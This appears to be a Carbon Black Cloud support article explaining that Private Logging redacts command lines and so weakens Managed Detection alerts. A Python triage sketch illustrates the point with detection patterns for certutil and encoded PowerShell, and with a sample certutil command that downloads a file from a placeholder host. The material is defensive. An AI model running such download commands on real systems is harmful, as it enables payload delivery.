Environment
- CBC Web Console: All Versions
- Managed Detection
Question
Does enabling Private Logging in a CBC policy cause the alerts sent from the Managed Detection team to contain less information?
Answer
Enabling Private Logging within a policy can prevent the Managed Detection team from sending much of the useful information obtained from an alert, thereby limiting the scope of the Managed Detection alerts.
Additional Notes
- The most important IOC being considered by the Managed Detection team is typically the command line argument, which is redacted if Private Logging is enabled.
- Enabling Private Logging can prevent the Managed Detection team from identifying "living off the land" attacks.
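
The effect described in the notes above can be shown with a small triage sketch. This is an added example, not Carbon Black code: the event fields, the rule set and the redaction model (command line replaced by None) are assumptions, and the sample events are constructed.

```python
import re

# Assumption: a redacted event carries no usable command line (None here);
# the console's real redaction format is not shown on this page.
REDACTED = None

# Hypothetical rule set: argument patterns for trusted system binaries.
SUSPICIOUS_ARGS = {
    "certutil.exe": re.compile(r"-urlcache\b", re.I),
    "powershell.exe": re.compile(r"-enc(odedcommand)?\b", re.I),
}

def triage(event):
    """Return 'suspicious', 'benign' or 'indeterminate' for one process event."""
    rule = SUSPICIOUS_ARGS.get(event["process"].lower())
    if rule is None:
        return "benign"          # not a binary this rule set watches
    cmdline = event.get("cmdline")
    if cmdline is REDACTED:
        return "indeterminate"   # trusted binary, arguments unknown
    return "suspicious" if rule.search(cmdline) else "benign"

def redact(event):
    """Model Private Logging: the same event with the command line removed."""
    return {**event, "cmdline": REDACTED}

def verdicts(events):
    """Triage a list of events and return the verdicts in order."""
    return [triage(e) for e in events]

# Constructed sample events (not real telemetry).
EVENTS = [
    {"process": "certutil.exe", "cmdline": "certutil.exe -hashfile report.docx SHA256"},
    {"process": "certutil.exe", "cmdline": "certutil.exe -urlcache -f http://example.invalid/a.bin a.bin"},
    {"process": "powershell.exe", "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"process": "notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    print("full command line:", verdicts(EVENTS))
    print("private logging:  ", verdicts([redact(e) for e in EVENTS]))
```

With the command line present, the two certutil.exe events are separated into benign and suspicious; once redacted, every event from a watched binary becomes indeterminate, so the analyst can no longer distinguish routine use from abuse of the same tool.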